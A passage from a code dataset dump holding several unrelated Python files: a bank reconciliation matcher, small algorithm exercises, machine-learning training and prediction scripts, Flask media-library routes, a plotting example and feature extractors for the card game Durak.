'../sav_files/score_correlation/axaie_percentagese_for_correlation_with_production_new.sav'\n\nold = get_data(sav_file_old_method)\nnew = get_data(sav_file_new_method)\ndata = get_differences(old,new)\nplot_data(data)","sub_path":"mydrive_python/Lifesense_data_analysis/code/analysis_percentage_changes_between_methods.py","file_name":"analysis_percentage_changes_between_methods.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"43180745","text":"import pandas as pd\nimport numpy as np\nimport re #delimiter\nimport datetime\nimport math\nimport json\n\nNUM_BEST_MATCHES = 3\n\nUSERNAME_WEIGHT = 0.2\nAMOUNT_WEIGHT = 0.3\nDATE_WEIGHT = 0.5\nTHRESHOLD = 75\n\nclass Categorise: \n def __init__(self, fundHistory, bankExport, folder):\n self.folder = folder + '/'\n self.a = pd.read_csv(self.folder + fundHistory)\n self.b = pd.read_csv(self.folder + bankExport)\n self.result = 0\n\n if (len(self.a.columns) == 7) and (len(self.b.columns) == 11):\n #create blank dataframe with username/matchRate columns and with number of rows equal to how many rows are in df1\n self.data = pd.DataFrame(columns=('Row #', 'Username', 'Amount', 'Match Rate (%)', 'Status', 'Manual Status'), index=range(0, len(self.a)))\n self.bestMatches = pd.DataFrame(columns=('Row #', 'Matching Row #', 'Username', 'Amount', 'Match Rate (%)'), index=range(0, len(self.a) * NUM_BEST_MATCHES))\n else:\n self.data = pd.DataFrame(columns=('Row #', 'Username', 'Amount', 'Match Rate (%)', 'Status', 'Manual Status'), index=range(0, len(self.b)))\n self.bestMatches = pd.DataFrame(columns=('Row #','Matching Row #', 'Username', 'Amount', 'Match Rate (%)'), index=range(0, len(self.b) * NUM_BEST_MATCHES))\n\n #rather than addressing columns by names, we can address each column by location, for example bankExport[bankExport.columns[1]]\n #will access data in column index 1\n \n #####################################################################\n #fundHistory map: index 1 - username, index 3 - amount, index 5 - date\n #bankExport map: index 1 - date, index 3 - name, index 5/6 - amount sent/received\n ####################################################################2#\n\n def run(self):\n if (len(self.a.columns) == 7) and (len(self.b.columns) == 11):\n return self.cmp(self.a, self.b)\n else:\n return self.cmp(self.b, self.a)\n\n def cmpUserNames(self, userName1, userName2):\n if type(userName2) is type(0.0):\n return 0\n string1 = userName1\n string2 = userName2.split()\n percent = 100/len(string1)\n value = 0\n for i in string2:\n temp = 0\n for j in string1:\n for k in i:\n if(j.lower() == k.lower()):\n temp = temp + percent\n break\n if(temp > value):\n value = temp \n return value\n \n def cmpDates(self, date1, date2):\n dic = {0:100, 1:80, 2:80,3:80, 4:60, 5:60, 6:40, 7:40, 8:10}# Can be used to hold and easily display the percentages for certain time periods\n x = date1.split()#splitting dates into day, month, year\n x = x[0].split(\"/\")\n if(int(x[2]) < 2000):\n x[2] = str(int(x[2])+2000)\n y = (date2.split(\"/\"))\n if (len(y) > 2):\n diff = datetime.date(int(y[2]),int(y[1]), int(y[0])) - datetime.date(int(x[2]),int(x[1]), int(x[0]))# dates are then swithced to year, month, day\n \n if (diff == datetime.timedelta(0)):#dates are equal\n return dic[0]\n\n elif (diff == datetime.timedelta(1) or diff == datetime.timedelta(2) or diff == datetime.timedelta(3)):#1-3 days\n return dic[1]\n \n elif (diff == datetime.timedelta(4) or diff == datetime.timedelta(5)):#4-5\n return dic[4]\n\n elif (diff == datetime.timedelta(6) or diff == datetime.timedelta(7)):#6-7\n return dic[6]\n \n elif (diff > datetime.timedelta(7)):#7+\n return dic[8]\n else:\n return 0 #the dates have been wrongly entered\n else:\n return 0\n #need to make values of the same type as types coming from csv files are either int, float or strings\n #in this case, I remove commas and converting remaining strings to floats\n def cmpAmount(self, amount1, amount2):\n temp1 = float(str(amount1).replace(',', ''))\n temp2 = float(str(amount2).replace(',', ''))\n if(temp1 == temp2):\n return 100\n else:\n return 0\n \n def getDataFrame1(self):\n return self.data.to_json(orient=\"records\");\n \n def getDataFrame2(self,id):\n r = []\n result = self.bestMatches.to_json(orient=\"records\");\n for i in json.loads(result):\n if int(i['Row #']) == int(id):\n r.append(i)\n\n return json.dumps(r)\n\n def getConfidence(self):\n return self.result\n\n #run all methods on a data passed in\n def cmp(self, df1, df2):\n\n confidence = 0\n matchedDic = {}\n for i in range(0, len(df1)):\n matchRate = 0\n matchRates = list()\n topRow = 0\n for j in range(0, len(df2)):\n temp = 0\n tempAmount = 0\n if not df2.loc[j][1] == \"End of File\":\n temp = temp + self.cmpUserNames(df1.loc[i][1], df2.loc[j][3]) * USERNAME_WEIGHT\n\n #isnan is a function provided by numpy library. It checks if the value is NaN(null)\n if not np.isnan(df2.loc[j][5]):\n temp = temp + self.cmpAmount(df1.loc[i][3], df2.loc[j][5]) * AMOUNT_WEIGHT\n tempNum = 5\n elif not np.isnan(df2.loc[j][6]):\n temp = temp + self.cmpAmount(df1.loc[i][3], df2.loc[j][6]) * AMOUNT_WEIGHT\n tempNum = 6\n \n if temp > 20:\n temp = temp + self.cmpDates(df1.loc[i][5], df2.loc[j][1]) * DATE_WEIGHT\n \n if not j in matchedDic:\n if(temp > matchRate):\n matchRate = int(math.ceil(temp))\n topRow = j\n \n #tuple (row number of bank export, match rate, column number with amount)\n matchRates.append((j, int(math.ceil(temp)), tempNum))\n \n matchedDic[j] = j\n matchRates = sorted(matchRates, key=lambda matches: matches[1])\n tuple1 = matchRates[-1]\n tuple2 = matchRates[-2]\n tuple3 = matchRates[-3]\n \n self.bestMatches.loc[i*NUM_BEST_MATCHES]['Row #'] = i\n self.bestMatches.loc[i*NUM_BEST_MATCHES]['Matching Row #'] = tuple1[0] + 1\n self.bestMatches.loc[i*NUM_BEST_MATCHES]['Username'] = df2.loc[tuple1[0]][3]\n self.bestMatches.loc[i*NUM_BEST_MATCHES]['Amount'] = df2.loc[tuple1[0]][tuple1[2]]\n self.bestMatches.loc[i*NUM_BEST_MATCHES]['Match Rate (%)'] = tuple1[1]\n \n self.bestMatches.loc[i*NUM_BEST_MATCHES+1]['Row #'] = i\n self.bestMatches.loc[i*NUM_BEST_MATCHES+1]['Matching Row #'] = tuple2[0] + 1\n self.bestMatches.loc[i*NUM_BEST_MATCHES+1]['Username'] = df2.loc[tuple2[0]][3]\n self.bestMatches.loc[i*NUM_BEST_MATCHES+1]['Amount'] = df2.loc[tuple2[0]][tuple2[2]]\n self.bestMatches.loc[i*NUM_BEST_MATCHES+1]['Match Rate (%)'] = tuple2[1]\n \n self.bestMatches.loc[i*NUM_BEST_MATCHES+2]['Row #'] = i\n self.bestMatches.loc[i*NUM_BEST_MATCHES+2]['Matching Row #'] = tuple3[0] + 1\n self.bestMatches.loc[i*NUM_BEST_MATCHES+2]['Username'] = df2.loc[tuple3[0]][3]\n self.bestMatches.loc[i*NUM_BEST_MATCHES+2]['Amount'] = df2.loc[tuple3[0]][tuple3[2]]\n self.bestMatches.loc[i*NUM_BEST_MATCHES+2]['Match Rate (%)'] = tuple3[1]\n \n self.data.loc[i]['Row #'] = i + 1\n self.data.loc[i]['Username'] = df1.loc[i][1]\n self.data.loc[i]['Amount'] = df1.loc[i][3]\n self.data.loc[i]['Match Rate (%)'] = matchRate\n if matchRate >= THRESHOLD:\n self.data.loc[i]['Status'] = 'done'\n else:\n self.data.loc[i]['Status'] = 'refused'\n self.data.loc[i]['Manual Status'] = df1.loc[i][4]\n\n if self.data.loc[i]['Status'] == self.data.loc[i]['Manual Status']:\n confidence += 1\n\n self.result = float(confidence) / float((len(df1) - 1))\n self.result *= 100\n self.result = float(\"{0:.2f}\".format(self.result))\n\n \n","sub_path":"grid_reconciliation_tool/reconciliation_tool/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":8488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"65038026","text":"def isBalanced(s):\n stack = []\n l = len(s)\n for i in range(0, l):\n if s[i] == '{' or s[i] == '[' or s[i] == '(':\n stack.append(s[i])\n if s[i] == ')':\n x = stack.pop()\n print(x)\n if x == '{' or x == '[':\n print('False')\n else:\n print('true')\n elif s[i] == '}':\n x = stack.pop()\n if x == '(' or x == '[':\n print('False')\n else:\n print('True')\n elif s[i] == ']':\n x = stack.pop()\n if x == '{' or x == '(':\n print('False')\n else:\n print('True')\n\ns = '()'\nprint(s)\nisBalanced(s)\n","sub_path":"balancedparenthesis.py","file_name":"balancedparenthesis.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"190206289","text":"import xgboost as xgb\nfrom sklearn import cross_validation\nimport numpy as np\nimport csv\ndata=[]\nmark=[]\nauc=[]\nacc=[]\nwith open('/Users/hhy/Desktop/test/data.csv','r',encoding='utf-8_sig') as f:\n csv_reader=csv.reader(f)\n for x in csv_reader:\n data.append(list(map(float,x[0:-1])))\n mark.append(float(x[-1]))\ndata=np.array(data)\nmark=np.array(mark)\nfor i in range(5):\n X_train, X_test, y_train, y_test = cross_validation.train_test_split(\n data, mark, test_size=0.05,random_state=i)\n dtrain=xgb.DMatrix(X_train,label=y_train)\n dtest=xgb.DMatrix(X_test)\n params={'booster':'gblinear',\n 'nthread':4,\n 'seed':1113,\n 'silent': 0}\n model=xgb.train(params,dtrain,num_boost_round=1900)\n ypred=model.predict(dtest)\n y_pred=(ypred>=0.5)*1\n from sklearn import metrics\n print ('ACC: %.4f' % metrics.accuracy_score(y_test,y_pred))\n acc.append(metrics.accuracy_score(y_test,y_pred))\n print ('AUC: %.4f' % metrics.roc_auc_score(y_test,ypred))\n auc.append(metrics.roc_auc_score(y_test,ypred))\n #print ('Recall: %.4f' % metrics.recall_score(y_test,y_pred))\n #print ('F1-score: %.4f' %metrics.f1_score(y_test,y_pred))\nprint('acc',sum(acc)/len(acc))\nprint('auc',sum(auc)/len(auc))\n'''auc 0.887654252238\nacc 0.808695652174'''","sub_path":"Graduation/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"232639386","text":"def replace_string_letters(string, index1, index2):\n helper_arr = []\n for char in string:\n helper_arr.append(char)\n\n temp = helper_arr[index2]\n helper_arr[index2] = helper_arr[index1]\n helper_arr[index1] = temp\n \n replaced_string = \"\"\n for char in helper_arr:\n replaced_string += char\n\n return replaced_string\n\ndef encrypt(word, key):\n encrypted_word = word\n n = len(key)\n\n for i in range(0, len(word)):\n encrypted_word = replace_string_letters(encrypted_word, i, key[i % n] - 1)\n\n return encrypted_word\n\nwords = []\nkey = []\nwith open(\"szyfr1.txt\") as txt_file:\n lines = []\n for i, line in enumerate(txt_file):\n lines.append(line.strip())\n for word in lines[:-1]:\n words.append(word)\n key_line_str_nums = lines[-1].split()\n for str_num in key_line_str_nums:\n key.append(int(str_num))\n\nfor word in words:\n encrypted_word = encrypt(word, key)\n print(encrypted_word)","sub_path":"zbior/76/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"2661682","text":"# -*- coding: utf-8 -*-\r\n#prediction using model.\r\n#process--->1.load data(X:list of lint,y:int). 2.create session. 3.feed data. 4.predict\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom a07_Transformer import Transformer\r\nfrom data_util_zhihu import load_data_predict,load_final_test_data,create_voabulary,create_voabulary_label\r\nfrom tflearn.data_utils import pad_sequences #to_categorical\r\nimport os\r\nimport codecs\r\n\r\n#configuration\r\nFLAGS=tf.app.flags.FLAGS\r\ntf.app.flags.DEFINE_integer(\"num_classes\",1999+3,\"number of label\") #3 ADDITIONAL TOKEN: _GO,_END,_PAD\r\ntf.app.flags.DEFINE_float(\"learning_rate\",0.01,\"learning rate\")\r\ntf.app.flags.DEFINE_integer(\"batch_size\", 128, \"Batch size for training/evaluating.\") #批处理的大小 32-->128 #16\r\ntf.app.flags.DEFINE_integer(\"decay_steps\", 6000, \"how many steps before decay learning rate.\") #6000批处理的大小 32-->128\r\ntf.app.flags.DEFINE_float(\"decay_rate\", 1.0, \"Rate of decay for learning rate.\") #0.87一次衰减多少\r\ntf.app.flags.DEFINE_string(\"ckpt_dir\",\"checkpoint_transformer/\",\"checkpoint location for the model\")\r\ntf.app.flags.DEFINE_integer(\"sequence_length\",25,\"max sentence length\") #100-->25\r\ntf.app.flags.DEFINE_integer(\"embed_size\",512,\"embedding size\")\r\ntf.app.flags.DEFINE_boolean(\"is_training\",False,\"is traning.true:tranining,false:testing/inference\")\r\n#tf.app.flags.DEFINE_string(\"cache_path\",\"text_cnn_checkpoint/data_cache.pik\",\"checkpoint location for the model\")\r\n#train-zhihu4-only-title-all.txt\r\ntf.app.flags.DEFINE_string(\"traning_data_path\",\"train-zhihu4-only-title-all.txt\",\"path of traning data.\") #O.K.train-zhihu4-only-title-all.txt-->training-data/test-zhihu4-only-title.txt--->'training-data/train-zhihu5-only-title-multilabel.txt'\r\ntf.app.flags.DEFINE_string(\"word2vec_model_path\",\"zhihu-word2vec-title-desc.bin-512\",\"word2vec's vocabulary and vectors\") #zhihu-word2vec.bin-100-->zhihu-word2vec-multilabel-minicount15.bin-100\r\ntf.app.flags.DEFINE_boolean(\"multi_label_flag\",True,\"use multi label or single label.\") #set this false. becase we are using it is a sequence of token here.\r\ntf.app.flags.DEFINE_float(\"l2_lambda\", 0.0001, \"l2 regularization\")\r\ntf.app.flags.DEFINE_string(\"predict_target_file\",\"checkpoint_transformer/zhihu_result_transformer.csv\",\"target file path for final prediction\")\r\ntf.app.flags.DEFINE_string(\"predict_source_file\",'test-zhihu-forpredict-title-desc-v6.txt',\"target file path for final prediction\") #test-zhihu-forpredict-v4only-title.txt\r\ntf.app.flags.DEFINE_integer(\"decoder_sent_length\",25,\"length of decoder inputs\")\r\n\r\ntf.app.flags.DEFINE_integer(\"d_model\",512,\"hidden size\")\r\ntf.app.flags.DEFINE_integer(\"d_k\",64,\"hidden size\")\r\ntf.app.flags.DEFINE_integer(\"d_v\",64,\"hidden size\")\r\ntf.app.flags.DEFINE_integer(\"h\",8,\"hidden size\")\r\ntf.app.flags.DEFINE_integer(\"num_layer\",1,\"hidden size\") #6\r\n#1.load data(X:list of lint,y:int). 2.create session. 3.feed data. 4.training (5.validation) ,(6.prediction)\r\n# 1.load data with vocabulary of words and labels\r\n_GO=\"_GO\"\r\n_END=\"_END\"\r\n_PAD=\"_PAD\"\r\n\r\ndef main(_):\r\n # 1.load data with vocabulary of words and labels\r\n vocabulary_word2index, vocabulary_index2word = create_voabulary(word2vec_model_path=FLAGS.word2vec_model_path,name_scope=\"transformer\") # simple='simple'\r\n vocab_size = len(vocabulary_word2index)\r\n print(\"transformer.vocab_size:\", vocab_size)\r\n vocabulary_word2index_label, vocabulary_index2word_label = create_voabulary_label(name_scope=\"transformer\",use_seq2seq=True)\r\n questionid_question_lists=load_final_test_data(FLAGS.predict_source_file)\r\n test= load_data_predict(vocabulary_word2index,vocabulary_word2index_label,questionid_question_lists)\r\n testX=[]\r\n question_id_list=[]\r\n for tuple in test:\r\n question_id,question_string_list=tuple\r\n question_id_list.append(question_id)\r\n testX.append(question_string_list)\r\n # 2.Data preprocessing: Sequence padding\r\n print(\"start padding....\")\r\n testX2 = pad_sequences(testX, maxlen=FLAGS.sequence_length, value=0.) # padding to max length\r\n print(\"end padding...\")\r\n # 3.create session.\r\n config=tf.ConfigProto()\r\n config.gpu_options.allow_growth=True\r\n with tf.Session(config=config) as sess:\r\n # 4.Instantiate Model\r\n model=Transformer(FLAGS.num_classes, FLAGS.learning_rate, FLAGS.batch_size, FLAGS.decay_steps, FLAGS.decay_rate, FLAGS.sequence_length,\r\n vocab_size, FLAGS.embed_size,FLAGS.d_model,FLAGS.d_k,FLAGS.d_v,FLAGS.h,FLAGS.num_layer,FLAGS.is_training,decoder_sent_length=FLAGS.decoder_sent_length,l2_lambda=FLAGS.l2_lambda)\r\n saver=tf.train.Saver()\r\n if os.path.exists(FLAGS.ckpt_dir+\"checkpoint\"):\r\n print(\"Restoring Variables from Checkpoint\")\r\n saver.restore(sess,tf.train.latest_checkpoint(FLAGS.ckpt_dir))\r\n else:\r\n print(\"Can't find the checkpoint.going to stop\")\r\n return\r\n # 5.feed data, to get logits\r\n number_of_training_data=len(testX2);print(\"number_of_training_data:\",number_of_training_data)\r\n index=0\r\n predict_target_file_f = codecs.open(FLAGS.predict_target_file, 'a', 'utf8')\r\n #decoder_input=np.reshape(np.array([vocabulary_word2index_label[_GO]]+[vocabulary_word2index_label[_PAD]]*(FLAGS.decoder_sent_length-1)),[-1,FLAGS.decoder_sent_length])\r\n decoder_input=np.full((FLAGS.batch_size,FLAGS.decoder_sent_length),vocabulary_word2index_label[_PAD])\r\n decoder_input[:,0:1]=vocabulary_word2index_label[_GO] #set all values in first column to _GO\r\n for start, end in zip(range(0, number_of_training_data, FLAGS.batch_size),range(FLAGS.batch_size, number_of_training_data+1, FLAGS.batch_size)):\r\n predictions,logits=sess.run([model.predictions,model.logits],\r\n feed_dict={model.input_x:testX2[start:end],\r\n model.decoder_input:decoder_input,\r\n model.dropout_keep_prob:1\r\n })\r\n ####################################################################################\r\n #for j in range(FLAGS.decoder_sent_length):\r\n # predict = sess.run(model.predictions, #model.loss_val,--->loss, model.train_op\r\n # feed_dict={model.input_x:testX2[start:end],\r\n # model.decoder_input:decoder_input,\r\n # #model.input_y_label: input_y_label,\r\n # model.dropout_keep_prob: 1.0,\r\n # })\r\n # decoder_input[:,j] = predict[:,j]\r\n ####################################################################################\r\n print(\"===============>\",start,\"predict:\",predict)\r\n # 6. get lable using logtis\r\n for _,logit in enumerate(logits):\r\n predicted_labels=get_label_using_logits(logit,predictions,vocabulary_index2word_label,vocabulary_word2index_label)\r\n print(index,\" ;predicted_labels:\",predicted_labels)\r\n # 7. write question id and labels to file system.\r\n write_question_id_with_labels(question_id_list[index],predicted_labels,predict_target_file_f)\r\n index=index+1\r\n predict_target_file_f.close()\r\n\r\ndef get_label_using_logits(logits, predictions,vocabulary_index2word_label,vocabulary_word2index_label, top_number=5):\r\n print(\"logits:\",logits.shape) #(6, 2002)\r\n result_list=[]\r\n for i,row in enumerate(logits):\r\n #print(\"i,\",i,\"row:\",row)\r\n if i!=len(logits)-1: #not include result from last column, which usually it should be TOKEN.\r\n label=process_each_row_get_lable(row,vocabulary_index2word_label,vocabulary_word2index_label,result_list)\r\n result_list.append(label)\r\n return result_list\r\n\r\ndef process_each_row_get_lable(row,vocabulary_index2word_label,vocabulary_word2index_label,result_list):\r\n \"\"\"\r\n :param row: it is a list.length is number of labels. e.g. 2002\r\n :param vocabulary_index2word_label\r\n :param result_list\r\n :return: a lable\r\n \"\"\"\r\n label_list=list(np.argsort(row))\r\n label_list.reverse()\r\n #print(\"label_list:\",label_list) # a list,length is number of labels.\r\n for i,index in enumerate(label_list): # if index is not exists, and not _PAD,_END, then it is the label we want.\r\n #print(i,\"index:\",index)\r\n flag1=vocabulary_index2word_label[index] not in result_list\r\n flag2=index!=vocabulary_word2index_label[_PAD]\r\n flag3=index!=vocabulary_word2index_label[_END]\r\n if flag1 and flag2 and flag3:\r\n #print(\"going to return \")\r\n return vocabulary_index2word_label[index]\r\n\r\n# write question id and labels to file system.\r\ndef write_question_id_with_labels(question_id,labels_list,f):\r\n labels_string=\",\".join(labels_list)\r\n f.write(question_id+\",\"+labels_string+\"\\n\")\r\n\r\nif __name__ == \"__main__\":\r\n tf.app.run()","sub_path":"a07_Transformer/a2_predict.py","file_name":"a2_predict.py","file_ext":"py","file_size_in_byte":9210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"192548215","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.datasets import load_iris\n\nfrom decision_tree import DecisionTreeClassifier\n\n\nif __name__ == '__main__':\n iris = load_iris()\n X = iris.data\n y = iris.target\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=27)\n\n model = DecisionTreeClassifier()\n model.fit(X_train, y_train)\n pred = model.predict(X_test)\n\n acc = accuracy_score(y_test, pred)\n\n print('Accuracy : {}'.format(acc))\n","sub_path":"decision_tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"368273319","text":"from flask import Flask, render_template\nimport jsonrpclib\n\nfrom Maraschino import app\nfrom settings import *\nfrom maraschino.noneditable import *\nfrom maraschino.tools import *\n\n@app.route('/xhr/library')\n@requires_auth\ndef xhr_library():\n return render_library()\n\n@app.route('/xhr/library/')\n@requires_auth\ndef xhr_library_root(item_type):\n api_address = server_api_address()\n\n if not api_address:\n return render_library(message=\"You need to configure XBMC server settings first.\")\n\n try:\n xbmc = jsonrpclib.Server(api_address)\n library = []\n title = \"Movies\"\n\n if item_type == 'movies':\n library = xbmc.VideoLibrary.GetMovies(sort={ 'method': 'label', 'ignorearticle' : True }, properties=['playcount'],)\n\n if item_type == 'shows':\n title = \"TV Shows\"\n library = xbmc.VideoLibrary.GetTVShows(sort={ 'method': 'label', 'ignorearticle' : True }, properties=['playcount'])\n\n except:\n return render_library(message=\"There was a problem connecting to the XBMC server.\")\n\n return render_library(library, title)\n\n@app.route('/xhr/library/shows/')\n@requires_auth\ndef xhr_library_show(show):\n xbmc = jsonrpclib.Server(server_api_address())\n library = xbmc.VideoLibrary.GetSeasons(tvshowid=show, properties=['tvshowid', 'season', 'showtitle', 'playcount'])\n library['tvshowid'] = show\n\n title = library['seasons'][0]['showtitle']\n\n return render_library(library, title)\n\n@app.route('/xhr/library/shows//')\n@requires_auth\ndef xhr_library_season(show, season):\n xbmc = jsonrpclib.Server(server_api_address())\n\n sort = { 'method': 'episode' }\n library = xbmc.VideoLibrary.GetEpisodes(tvshowid=show, season=season, sort=sort, properties=['tvshowid', 'season', 'showtitle', 'episode', 'plot', 'playcount'])\n\n episode = library['episodes'][0]\n title = '%s - Season %s' % (episode['showtitle'], episode['season'])\n\n return render_library(library, title)\n\ndef render_library(library=None, title=\"Media Library\", message=None):\n return render_template('library.html',\n library = library,\n title = title,\n message = message,\n )\n","sub_path":"modules/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"552944710","text":"import os\nimport code\n\nfrom flaskext.script import Manager, Server, Shell, Command\n\nfrom app.main import app\n\nmanager = Manager(app)\n\nclass DevServer(Server):\n description = \"Run the local dev server\"\n def handle(self, *args, **kwargs):\n super(DevServer, self).handle(*args, **kwargs)\n\nclass IShell(Shell):\n def run(self, no_ipython):\n \"\"\"\n Runs the shell. Unless no_ipython is True or use_python is False\n then runs IPython shell if that is installed.\n \"\"\"\n\n context = self.get_context()\n if not no_ipython:\n from IPython.frontend.terminal.embed import InteractiveShellEmbed\n sh = InteractiveShellEmbed(banner2=self.banner)\n sh(global_ns=dict(), local_ns=context)\n return\n\n code.interact(self.banner, local=context)\n\ndev_server = DevServer(host='0.0.0.0', port=5001, use_debugger=True, use_reloader=True)\nmanager.add_command('rundev', dev_server)\nmanager.add_command('shell', IShell())\n\nif __name__ == \"__main__\":\n manager.run()\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"596552674","text":"import matplotlib.pyplot as plt\n\n# prepare data\nx = [1, 2, 3, 4]\ny = [10, 20, 25, 30]\n\n# create plot\nfig = plt.figure()\n\n# plot\nax = fig.add_subplot(111)\n\n# customize plot\nax.plot(x, y, color='lightblue', linewidth=3)\nax.scatter([2,4,6],\n[5,15,25],\ncolor='darkgreen',\nmarker='^')\nax.set_xlim(1, 6.5)\n\n# save plot\nplt.savefig('plot.png')\n\n# show plot\nplt.show()\n","sub_path":"Python/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"503373600","text":"# FeatureExtractors.py\r\n# --------------------\r\n# Licensing Information: Please do not distribute or publish solutions to this\r\n# project. You are free to use and extend these projects for educational\r\n# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by\r\n# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\r\n# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html\r\n\r\n\r\nimport Util\r\nfrom Player import choose_min_card\r\n\r\n\r\nclass FeatureExtractor:\r\n def getFeatures(self, state, action):\r\n \"\"\"\r\n Returns a dict from features to counts\r\n Usually, the count will just be 1.0 for\r\n indicator functions.\r\n \"\"\"\r\n Util.raiseNotDefined()\r\n\r\n\r\nclass IdentityExtractor(FeatureExtractor):\r\n def getFeatures(self, state, action):\r\n features = Util.Counter()\r\n features[(state, action)] = 1.0\r\n return features\r\n\r\n\r\nclass LightWeightState:\r\n def __init__(self, player_hand, table_cards, pile_cards, trump_suit):\r\n self.over_ten_reg_cards = \\\r\n [card.number for card in player_hand if\r\n card.suit != trump_suit and card.number > 10]\r\n self.over_ten_trump_cards = \\\r\n [card.number for card in player_hand if\r\n card.suit == trump_suit and card.number > 10]\r\n\r\n self.over_ten_reg_cards_in_pile = \\\r\n [card.number for card in pile_cards if\r\n card.suit != trump_suit and card.number > 10]\r\n self.over_ten_trump_cards_in_pile = \\\r\n [card.number for card in pile_cards if\r\n card.suit == trump_suit and card.number > 10]\r\n\r\n self.table_cards = table_cards\r\n\r\n self.amnt_trump = \\\r\n sum(1 for card in player_hand if card.suit == trump_suit)\r\n self.amnt_non_trump = \\\r\n sum(1 for card in player_hand if card.suit != trump_suit)\r\n\r\n def __repr__(self):\r\n return \"{},{},{},{},{},{},{}\".\\\r\n format(self.over_ten_reg_cards,\r\n self.over_ten_trump_cards,\r\n self.over_ten_reg_cards_in_pile,\r\n self.over_ten_trump_cards_in_pile,\r\n self.table_cards, self.amnt_trump, self.amnt_non_trump)\r\n\r\n def __hash__(self):\r\n return hash(repr(self))\r\n\r\n\r\nclass DurakFeatureExtractor(FeatureExtractor):\r\n def get_number_dict(self, player_hand):\r\n ret = Util.Counter()\r\n for card in player_hand:\r\n ret[card.number] += 1\r\n return ret\r\n\r\n def get_suit_dict(self, player_hand):\r\n ret = Util.Counter()\r\n for card in player_hand:\r\n ret[card.suit] += 1\r\n return ret\r\n\r\n def mean_arr(self, arr):\r\n return sum(card.number for card in arr) / (len(arr) * 14) if len(arr) != 0 else 0\r\n\r\n def get_suit_means(self, player_hand):\r\n heart_cards = []\r\n spades_cards = []\r\n diamonds_cards = []\r\n clubs_cards = []\r\n\r\n for card in player_hand:\r\n if card.suit == \"hearts\":\r\n heart_cards.append(card)\r\n elif card.suit == \"clubs\":\r\n clubs_cards.append(card)\r\n elif card.suit == \"diamonds\":\r\n diamonds_cards.append(card)\r\n elif card.suit == \"spades\":\r\n spades_cards.append(card)\r\n\r\n heart_cards_mean = self.mean_arr(heart_cards)\r\n spades_cards_mean = self.mean_arr(spades_cards)\r\n diamonds_cards_mean = self.mean_arr(diamonds_cards)\r\n clubs_cards_mean = self.mean_arr(clubs_cards)\r\n\r\n return heart_cards_mean, spades_cards_mean, diamonds_cards_mean, clubs_cards_mean\r\n\r\n def getFeatures(self, state, action):\r\n features = Util.Counter()\r\n\r\n trump_suit = state.trump_card.suit\r\n player_hand = state.current_player.get_cards()\r\n amount_cards = len(state.current_player.get_cards())\r\n suit_dict = self.get_suit_dict(player_hand)\r\n\r\n features[\"amount_trump\"] = sum(1 for card in player_hand if card.suit == trump_suit) / \\\r\n amount_cards if amount_cards != 0 else 0\r\n\r\n features[\"mean_number\"] = sum(card.number for card in player_hand) / amount_cards\r\n\r\n features[\"variance_number\"] = sum((features[\"mean_number\"] - card.number) ** 2 for card in player_hand) / \\\r\n amount_cards\r\n\r\n variance_mean = sum(suit_dict.values()) / 4\r\n features[\"variance_suit\"] = sum((variance_mean - num_suit) ** 2 for num_suit in suit_dict.values()) / 4\r\n\r\n features[\"cards_diff\"] = (len(state.current_player.get_opponent(state).get_cards()) -\r\n len(state.current_player.get_cards())) / 36\r\n features[\"is_card_minimum\"] = 1 if action == choose_min_card(state.current_player.options(state.table,\r\n state.trump_card.suit),\r\n state.trump_card.suit) else 0\r\n\r\n if len(state.deck.get_cards()) < 6:\r\n features[\"cards_on_hand\"] = -amount_cards / (36 * (len(state.deck.get_cards()) + 1))\r\n\r\n if len(state.deck.get_cards()) == 0:\r\n opponent_hand = state.current_player.get_opponent(state).get_cards()\r\n self_suit_means = self.get_suit_means(player_hand)\r\n opponent_suit_means = self.get_suit_means(opponent_hand)\r\n\r\n features[\"amount_trump_opponent\"] = -sum(1 for card in opponent_hand if card.suit == trump_suit) / \\\r\n len(opponent_hand) if len(opponent_hand) != 0 else 0\r\n\r\n hearts_mean_diff = self_suit_means[0] - opponent_suit_means[0]\r\n spades_mean_diff = self_suit_means[1] - opponent_suit_means[1]\r\n diamnods_mean_diff = self_suit_means[2] - opponent_suit_means[2]\r\n clubs_mean_diff = self_suit_means[3] - opponent_suit_means[3]\r\n features[\"suits_means_diff\"] = (hearts_mean_diff + spades_mean_diff + diamnods_mean_diff + clubs_mean_diff) / 4\r\n\r\n self_trumps = [card.number for card in player_hand if card.suit == trump_suit]\r\n enemy_trumps = [card.number for card in opponent_hand if card.suit == trump_suit]\r\n highest_self_trump = max(self_trumps) if len(self_trumps) != 0 else 0\r\n highest_enemy_trump = max(enemy_trumps) if len(enemy_trumps) != 